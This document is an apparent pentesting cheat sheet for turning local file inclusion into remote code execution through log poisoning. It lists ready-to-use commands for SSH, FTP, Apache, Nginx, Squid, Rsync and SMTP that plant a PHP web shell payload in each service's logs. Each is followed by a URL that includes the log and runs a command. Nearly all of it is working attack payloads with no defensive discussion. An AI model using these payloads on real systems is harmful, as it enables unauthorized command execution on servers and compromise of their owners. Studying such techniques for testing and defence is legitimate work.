Log Poisoning (LFI to RCE)

Services

SSH

ssh '<?php system($_GET["cmd"]); ?>'@192.168.1.2                                                                           

http://192.168.1.2/file.php?file=/var/log/auth.log&cmd=id                                   

FTP

lftp -u '<?php system($_GET["cmd"]); ?>', 192.168.1.2

http://192.168.1.2/file.php?file=/var/log/vsftpd.log&cmd=id

HTTP (User-Agent)

Apache2

# User-Agent: <?php system($_GET['cmd']); ?>
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"

http://192.168.1.2/file.php?file=/var/log/apache2/access.log&cmd=id

Nginx

# User-Agent: <?php system($_GET['cmd']); ?>
curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2"

http://192.168.1.2/file.php?file=/var/log/nginx/access.log&cmd=id

Squid

# User-Agent: <?php system($_GET['cmd']); ?>
curl -sX GET --proxy "http://192.168.1.2:3128" "http://127.0.0.1:80" -A '<?php system($_GET["cmd"]); ?>'

http://192.168.1.2/file.php?file=/var/log/squid/access.log&cmd=id

Rsync

rsync 192.168.1.2::'<?php system($_GET["cmd"]); ?>'

http://192.168.1.2/file.php?file=/var/log/rsyncd.log&cmd=id

SMTP

❯ telnet 192.168.1.95 25
VRFY cain
MAIL FROM: cain
RCPT TO: abel
DATA
Subject: LOG POISONING
<?php system($_GET['cmd']); ?>
.
QUIT

http://192.168.1.2/emailreader.php?id=/var/mail/cain&cmd=id